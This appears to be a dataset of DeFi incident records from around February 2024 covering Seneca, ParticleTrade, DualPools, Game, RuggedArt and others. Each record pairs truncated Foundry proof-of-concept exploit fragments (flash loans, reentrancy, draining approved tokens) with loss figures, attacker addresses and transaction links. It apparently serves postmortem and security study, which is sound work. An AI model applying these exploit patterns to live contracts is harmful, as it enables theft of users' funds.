// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$6M // Attacker : https://etherscan.io/address/0x94641c01a4937f2c8ef930580cf396142a2942dc // Vuln Contract : https://etherscan.io/address/0x65c210c59b43eb68112b7a4f75c8...
exploit_poc
Seneca
2024-02
Seneca_exp.sol
null
eeb6a4a7c030ffb1
2026-01-07T10:59:16.514521
postmortems
ethereum
19,325,936
~$6M
6,000,000
https://etherscan.io/address/0x94641c01a4937f2c8ef930580cf396142a2942dc
null
null
https://app.blocksec.com/explorer/tx/eth/0x23fcf9d4517f7cc39815b09b0a80c023ab2c8196c826c93b4100f2e26b701286
null
null
true
true
false
critical
~$6M
unknown
function testExploit() public { // Datas uint256 amount = PendlePrincipalToken.balanceOf(victim); bytes memory callData = abi.encodeWithSignature("transferFrom(address,address,uint256)", victim, address(this), amount); bytes memory data = abi.encode(address(PendlePrincipalTok...
true
~$6M
https://etherscan.io/address/0x94641c01a4937f2c8ef930580cf396142a2942dc
https://app.blocksec.com/explorer/tx/eth/0x23fcf9d4517f7cc39815b09b0a80c023ab2c8196c826c93b4100f2e26b701286
$6.00M
6.26
medium
Seneca Exploit (2024-02)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.24; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~50 $ETH // Attacker : https://etherscan.io/address/0x2c903f97ea69b393ea03e7fab8d64d722b3f5559 // Attack Contract : https://etherscan.io/address/0xe55607b2967ddbe5fa9a6a...
exploit_poc
ParticleTrade
2024-02
ParticleTrade_exp.sol
null
a9ac3d0b2d200448
2026-01-07T10:59:16.514573
postmortems
ethereum
19,231,445
~50 $ETH
50
https://etherscan.io/address/0x2c903f97ea69b393ea03e7fab8d64d722b3f5559
https://etherscan.io/address/0xe55607b2967ddbe5fa9a6a921991545b8277ef8f
https://etherscan.io/address/0xe4764f9cd8ecc9659d3abf35259638b20ac536e4
https://etherscan.io/tx/0xd9b3e229acc755881890394cc76fde0d7b83b1abd4d046b0f69c1fd9fd495ff6
null
null
true
true
false
low
~50 $ETH
unknown
function testExploit() public { payable(zero).transfer(address(this).balance); emit log_named_decimal_uint("Attacker Eth balance before attack:", address(this).balance, 18); uint256 tokenId = 50_126_827_091_960_426_151; uint256 tokenId2 = 19_231_446; (uint256 lienId) = proxy.offe...
true
~50 $ETH
https://etherscan.io/address/0x2c903f97ea69b393ea03e7fab8d64d722b3f5559
https://etherscan.io/address/0xe55607b2967ddbe5fa9a6a921991545b8277ef8f
https://etherscan.io/address/0xe4764f9cd8ecc9659d3abf35259638b20ac536e4
https://etherscan.io/tx/0xd9b3e229acc755881890394cc76fde0d7b83b1abd4d046b0f69c1fd9fd495ff6
$50
8.23
high
ParticleTrade Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~3.5 WBNB // Attacker : https://bscscan.com/address/0x031958a8137745350549fd95055398dd536a07c7 // Attack Contract : https://bscscan.com/address...
exploit_poc
MINER_bsc
2024-02
MINER_bsc_exp.sol
flash_loan
d6f2b2f39e71b48c
2026-01-07T10:59:16.514620
postmortems
bsc
36,111,183
~3.5 WBNB
3.5
https://bscscan.com/address/0x031958a8137745350549fd95055398dd536a07c7
https://bscscan.com/address/0xc9716ec1b0503316233e3bcc50853f0df6befd43
https://bscscan.com/address/0x2ba9d4a8c41c60b71ff7df2c3f54b008644b954e
https://bscscan.com/tx/0x15ab671c9bf918fa4b6a9eed9ccb527f32aca40e926ede2aec2c84dfa9c30512
null
null
true
true
true
low
~3.5 WBNB
flash-loan
function testExploit() public { Miner.approve(address(Router), type(uint256).max); WBNB.approve(address(Router), type(uint256).max); DVM(dodo).flashLoan(10 * 1e18, 0, address(this), abi.encode(0x3078)); emit log_named_decimal_uint("[End] Attacker WBNB balance after exploit", WBNB.balanc...
true
~3.5 WBNB
https://bscscan.com/address/0x031958a8137745350549fd95055398dd536a07c7
https://bscscan.com/address/0xc9716ec1b0503316233e3bcc50853f0df6befd43
https://bscscan.com/address/0x2ba9d4a8c41c60b71ff7df2c3f54b008644b954e
https://bscscan.com/tx/0x15ab671c9bf918fa4b6a9eed9ccb527f32aca40e926ede2aec2c84dfa9c30512
$4
8.26
high
MINER_bsc Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~2.24 $WBNB // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Attack Contract : https://bscscan.com/address/0x3559ee265fc9c5c9a333b07e0199480b4a84f369 // Vulnerable Contract : https://bscsca...
exploit_poc
Babyloogn
2024-02
Babyloogn_exp.sol
null
3385651e7a8a7e38
2026-01-07T10:59:16.514667
postmortems
bsc
36,159,516
~2.24 $WBNB
2.24
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x3559ee265fc9c5c9a333b07e0199480b4a84f369
https://bscscan.com/address/0x971d08bba900230298add23e61e04b04226b5073
https://app.blocksec.com/explorer/tx/bsc/0xd081d6bb96326be5305a6c00dd51d1799971794941576554341738abc1ceb202
null
null
true
false
false
low
~2.24 $WBNB
unknown
function testExploit() public { emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this))); Babyloogn.approve(address(Router), type(uint256).max); BabyloognNTF.setApprovalForAll(address(Airdrop), true); while (Babyloogn.balanceOf(address(Airdrop)) >= 285 *...
true
~2.24 $WBNB
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x3559ee265fc9c5c9a333b07e0199480b4a84f369
https://bscscan.com/address/0x971d08bba900230298add23e61e04b04226b5073
https://app.blocksec.com/explorer/tx/bsc/0xd081d6bb96326be5305a6c00dd51d1799971794941576554341738abc1ceb202
$2
7.31
medium
Babyloogn Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.24; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~140 $ETH // Attacker : https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba // Attack Contract : https://etherscan.io/address/0xbff51c9c3d50d6168dfef...
exploit_poc
Miner
2024-02
Miner_exp.sol
null
56c52ef75aebfc6c
2026-01-07T10:59:16.514713
postmortems
ethereum
19,226,508
~140 $ETH
140
https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
https://etherscan.io/address/0xbff51c9c3d50d6168dfef72133f5dbda453ebf29
https://etherscan.io/address/0x732276168b421d4792e743711e1a48172ea574a2
https://etherscan.io/tx/0x75e3aeb00df69882a1b15d424e5e642650326ca3b923d7fd1922d57c51bc2c78
null
null
true
true
false
low
~140 $ETH
unknown
function testExploit() public { emit log_named_uint("Attacker ETH balance before exploit", WETH.balanceOf(address(this))); cheats.startPrank(attacker); MINER.transfer(address(this), MINER.balanceOf(attacker)); MINER.balanceOf(address(this)); cheats.stopPrank(); bool zero...
true
~140 $ETH
https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
https://etherscan.io/address/0xbff51c9c3d50d6168dfef72133f5dbda453ebf29
https://etherscan.io/address/0x732276168b421d4792e743711e1a48172ea574a2
https://etherscan.io/tx/0x75e3aeb00df69882a1b15d424e5e642650326ca3b923d7fd1922d57c51bc2c78
$140
7.49
medium
Miner Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~20 ETH // Attacker : https://etherscan.io/address/0x145766a51ae96e69810fe76f6f68fd0e95675a0b // Attack Contract : https://etherscan.io/address/0x8d4de2bc1a566b266bd4b38...
exploit_poc
Game
2024-02
Game_exp.sol
reentrancy
6536ccc066a9eca1
2026-01-07T10:59:16.514756
postmortems
ethereum
19,213,946
~20 ETH
20
https://etherscan.io/address/0x145766a51ae96e69810fe76f6f68fd0e95675a0b
https://etherscan.io/address/0x8d4de2bc1a566b266bd4b387f62c21e15474d12a
null
https://app.blocksec.com/explorer/tx/eth/0x0eb8f8d148508e752d9643ccf49ac4cb0c21cbad346b5bbcf2d06974d31bd5c4
null
null
true
true
true
low
~20 ETH
reentrancy
function testExploit() public { // Start with 0.6 Ether balance deal(address(this), 0.6 ether); emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18); // Following amount will be returned multiple times in receive() function when exploiter make th...
true
~20 ETH
https://etherscan.io/address/0x145766a51ae96e69810fe76f6f68fd0e95675a0b
https://etherscan.io/address/0x8d4de2bc1a566b266bd4b387f62c21e15474d12a
https://app.blocksec.com/explorer/tx/eth/0x0eb8f8d148508e752d9643ccf49ac4cb0c21cbad346b5bbcf2d06974d31bd5c4
$20
7.07
medium
Game Exploit (2024-02)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/eth/0x7c5a909b45014e35ddb89697f6be38d08eff30e7c3d3d553033a6efc3b444fdd // GUY : https://twitter.com/pennysplayer/status/1766479470058406174 // Profit :...
exploit_poc
PANDORA
2024-02
PANDORA_exp.sol
null
c82b3a4c78ec242e
2026-01-07T10:59:16.514801
postmortems
unknown
19,184,577
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.1
low
PANDORA Exploit (2024-02)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~20 ETH // TX : https://app.blocksec.com/explorer/tx/eth/0xcf834aff4de9992f5da9c443600dad9c6277a8a00de5007842fece51564992db // Attacker : https://etherscan.io/address/0x24a0c66f185874b251eb70bee2c2e35e398484...
exploit_poc
ADC
2024-02
ADC_exp.sol
flash_loan
3bb7259f0229056f
2026-01-07T10:59:16.514841
postmortems
ethereum
19,138,640
~20 ETH
20
https://etherscan.io/address/0x24a0c66f185874b251eb70bee2c2e35e39848419
https://etherscan.io/address/0x2ffdce5f0c09a8ee3a568bc01f35894b2d77a6d6
null
null
null
null
true
false
true
low
~20 ETH
flash-loan
function testexploit() public payable { Helper = new Help{value: 18 ether}(); WETH.approve(address(mainpool), 18 ether); WETH.approve(address(tick), 18 ether); WETH.approve(address(Helper), 18 ether); Helper.startwith(); emit log_named_decimal_uint("Attacker WETH balanc...
true
https://etherscan.io/address/0x24a0c66f185874b251eb70bee2c2e35e39848419
https://etherscan.io/address/0x2ffdce5f0c09a8ee3a568bc01f35894b2d77a6d6
$20
7.02
medium
ADC Exploit (2024-02)
true
false
false
false
import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$42000 USD // Attacker : https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c // Attack Contract : https://bscscan.com/address/0x38721b0d67dfdba1411bb277d95af3d53fa7200e // Vulnerable Contract : https://bscscan.com...
exploit_poc
DualPools
2024-02
DualPools_exp.sol
flash_loan
3dd21370b32ab20b
2026-01-07T10:59:16.514895
postmortems
bsc
36,145,772
~$42000 USD
42,000
https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c
https://bscscan.com/address/0x38721b0d67dfdba1411bb277d95af3d53fa7200e
https://bscscan.com/address/0x5e5e28029ef37fc97ffb763c4ac1f532bbd4c7a2
https://bscscan.com/tx/0x90f374ca33fbd5aaa0d01f5fcf5dee4c7af49a98dc56b47459d8b7ad52ef1e93
null
null
true
true
true
medium
~$42000 USD
flash-loan
function testAttack() public { approveAll(); DPPOracle_0x1b52.flashLoan(7_001_000_000_000_000_000, 0, address(this), new bytes(1)); // borrow BUSD }
true
~$42000 USD
https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c
https://bscscan.com/address/0x38721b0d67dfdba1411bb277d95af3d53fa7200e
https://bscscan.com/address/0x5e5e28029ef37fc97ffb763c4ac1f532bbd4c7a2
https://bscscan.com/tx/0x90f374ca33fbd5aaa0d01f5fcf5dee4c7af49a98dc56b47459d8b7ad52ef1e93
$42.0K
10
high
DualPools Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~5 $ETH // Attacker : https://etherscan.io/address/0x9733303117504c146a4e22261f2685ddb79780ef // Attack Contract : https://etherscan.io/address/0x9bb0ca1e54025232e18f387...
exploit_poc
RuggedArt
2024-02
RuggedArt_exp.sol
null
b86cba36a2d88e18
2026-01-07T10:59:16.514973
postmortems
ethereum
19,262,234
~5 $ETH
5
https://etherscan.io/address/0x9733303117504c146a4e22261f2685ddb79780ef
https://etherscan.io/address/0x9bb0ca1e54025232e18f3874f972a851a910e9cb
https://etherscan.io/address/0xfe380fe1db07e531e3519b9ae3ea9f7888ce20c6
https://etherscan.io/tx/0x5a63da39b5b83fccdd825fed0226f330f802e995b8e49e19fbdd246876c67e1f
null
null
true
false
false
low
~5 $ETH
unknown
function testExploit() public { payable(address(0)).transfer(WETH.balanceOf(address(this))); deal(address(this), 0.000000000000000001 ether); emit log_named_uint("Attacker Eth balance before attack:", WETH.balanceOf(address(this))); pool.flash(address(this), flashnumber, 0, abi.encode(0)...
true
~5 $ETH
https://etherscan.io/address/0x9733303117504c146a4e22261f2685ddb79780ef
https://etherscan.io/address/0x9bb0ca1e54025232e18f3874f972a851a910e9cb
https://etherscan.io/address/0xfe380fe1db07e531e3519b9ae3ea9f7888ce20c6
https://etherscan.io/tx/0x5a63da39b5b83fccdd825fed0226f330f802e995b8e49e19fbdd246876c67e1f
$5
8.66
high
RuggedArt Exploit (2024-02)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : Unclear // Attacker : https://polygonscan.com/address/0x149b268b8b8101e2b5df84a601327484cb43221c // Attack Contract : https://polygonscan.com/address/0x367120bf791cc03f0...
exploit_poc
SMOOFSStaking
2024-02
SMOOFSStaking_exp.sol
null
f158781465e5f2e7
2026-01-07T10:59:16.515031
postmortems
polygon
54,056,707
Unclear
null
https://polygonscan.com/address/0x149b268b8b8101e2b5df84a601327484cb43221c
https://polygonscan.com/address/0x367120bf791cc03f040e2574aea0ca7790d3d2e5
null
null
null
null
true
true
false
medium
Unclear
unknown
function testExploit() public { // For the purpose of this poc transfer Smoofs NFT token from original attack contract vm.prank(attackContract); Smoofs.transferFrom(attackContract, address(this), smoofsTokenId); Smoofs.approve(address(SMOOFSStaking), smoofsTokenId); // Set initi...
true
Unclear
https://polygonscan.com/address/0x149b268b8b8101e2b5df84a601327484cb43221c
https://polygonscan.com/address/0x367120bf791cc03f040e2574aea0ca7790d3d2e5
Unknown
4.52
low
SMOOFSStaking Exploit (2024-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* @KeyInfo - Total Lost: 33 $aEthwstETH - Attacker: https://etherscan.io/address/0x09f6be2a7d0d2789f01ddfaf04d4eaa94efc0857 - Attack Contract: https://etherscan.io/address/0x12d85...
exploit_poc
AffineDeFi
2024-02
AffineDeFi_exp.sol
flash_loan
51c9f40ef6fc4601
2026-01-07T10:59:16.515073
postmortems
ethereum
19,132,935
33 $aEthwstETH
33
https://etherscan.io/address/0x09f6be2a7d0d2789f01ddfaf04d4eaa94efc0857
https://etherscan.io/address/0x12d85e5869258a80d4bebe70d176d0f58b2d68e4
null
https://app.blocksec.com/explorer/tx/eth/0x03543ef96c26d6c79ff6c24219c686ae6d0eb5453b322e54d3b6a5ce456385e5
null
null
true
false
true
low
33 $aEthwstETH
flash-loan
false
33 $aEthwstETH
https://etherscan.io/address/0x09f6be2a7d0d2789f01ddfaf04d4eaa94efc0857
https://etherscan.io/address/0x12d85e5869258a80d4bebe70d176d0f58b2d68e4
https://app.blocksec.com/explorer/tx/eth/0x03543ef96c26d6c79ff6c24219c686ae6d0eb5453b322e54d3b6a5ce456385e5
$33
5.33
medium
AffineDeFi Exploit (2024-02)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~2 $ETH // Vulnerable Contract : https://etherscan.io/address/0xFb35DE57B117FA770761C1A344784075745F84F9 // @Analysis // https://x.com/PeiQi_0/status/1759826303044497726 import "forge-std/Test.sol"; import "./../interface.sol...
exploit_poc
EGGX
2024-02
EGGX_exp.sol
null
4793db4604c3220b
2026-01-07T10:59:16.515125
postmortems
ethereum
19,252,567
~2 $ETH
2
null
null
https://etherscan.io/address/0xFb35DE57B117FA770761C1A344784075745F84F9
null
null
null
true
true
false
low
~2 $ETH
unknown
function testExploit() public { payable(address(0)).transfer(address(this).balance); bytes memory pollbalance = abi.encode(EGGX.balanceOf(address(pool))); WETH.approve(address(pool), type(uint256).max); EGGX.approve(address(pool), type(uint256).max); emit log_named_uint("Attacker...
true
~2 $ETH
https://etherscan.io/address/0xFb35DE57B117FA770761C1A344784075745F84F9
$2
7.36
medium
EGGX Exploit (2024-02)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~14 ETH // TX : https://app.blocksec.com/explorer/tx/eth/0x06d7e7436414c658a33452d28400799f3637e83930dcec39b3bd065dabc6ef04 // Attacker : https://etherscan.io/address/0...
exploit_poc
Zoomer
2024-02
Zoomer_exp.sol
flash_loan
bd70700704ae3f61
2026-01-07T10:59:16.515175
postmortems
ethereum
19,291,249
~14 ETH
14
https://etherscan.io/address/0xb0380b6d7a63e7cbf274c3b3c8838abbd6bd4abe
https://etherscan.io/address/0xa4854022f4c16f0abc3fdec300427f6179a3043b
null
null
null
null
true
false
true
low
~14 ETH
flash-loan
false
https://etherscan.io/address/0xb0380b6d7a63e7cbf274c3b3c8838abbd6bd4abe
https://etherscan.io/address/0xa4854022f4c16f0abc3fdec300427f6179a3043b
$14
5.12
medium
Zoomer Exploit (2024-02)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; // Attacker: https://bscscan.com/address/0xc726bd0e973722e17eb088b8fcfedaa931fa0293 // Attack Contract: https://bscscan.com/address/0xe02970bd38b283c3079720c1e71001abe001bc83 // Attack Tx: https://phalcon.blocksec.com/tx/bsc/...
exploit_poc
FDP
2023-02
FDP_exp.sol
flash_loan
625568195bbf078a
2026-01-07T10:59:16.515222
postmortems
bsc
25,430,418
null
null
https://bscscan.com/address/0xc726bd0e973722e17eb088b8fcfedaa931fa0293
https://bscscan.com/address/0xe02970bd38b283c3079720c1e71001abe001bc83
null
https://phalcon.blocksec.com/tx/bsc/0x09925028ce5d6a54801d04ff8f39e79af6c24289e84b301ddcdb6adfa51e901b
null
null
false
true
true
medium
null
flash-loan
false
https://bscscan.com/address/0xc726bd0e973722e17eb088b8fcfedaa931fa0293
https://bscscan.com/address/0xe02970bd38b283c3079720c1e71001abe001bc83
https://phalcon.blocksec.com/tx/bsc/0x09925028ce5d6a54801d04ff8f39e79af6c24289e84b301ddcdb6adfa51e901b
Unknown
5.18
medium
FDP Exploit (2023-02)
false
false
true
false